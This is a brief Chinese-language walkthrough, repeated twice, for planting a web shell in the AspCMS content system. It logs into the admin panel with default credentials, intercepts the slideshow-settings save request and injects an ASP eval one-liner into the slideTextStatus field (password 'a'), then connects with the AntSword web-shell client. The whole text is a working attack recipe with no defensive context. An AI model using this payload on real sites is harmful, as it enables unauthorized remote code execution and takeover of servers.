1.通过访问/admin_aspcms/login.asp来到后台
使用admin 123456 登录
2.点击扩展功能-幻灯片设置-保存,同时进行抓包
3.修改数据包中的slideTextStatus字段,将其更改为
1%25><%25Eval(Request (chr(65)))%25><%25
密码为a
4.访问木马的地址,进行蚁剑连接
1.通过访问/admin_aspcms/login.asp来到后台
使用admin 123456 登录
2.点击扩展功能-幻灯片设置-保存,同时进行抓包
3.修改数据包中的slideTextStatus字段,将其更改为
1%25><%25Eval(Request (chr(65)))%25><%25
密码为a
4.访问木马的地址,进行蚁剑连接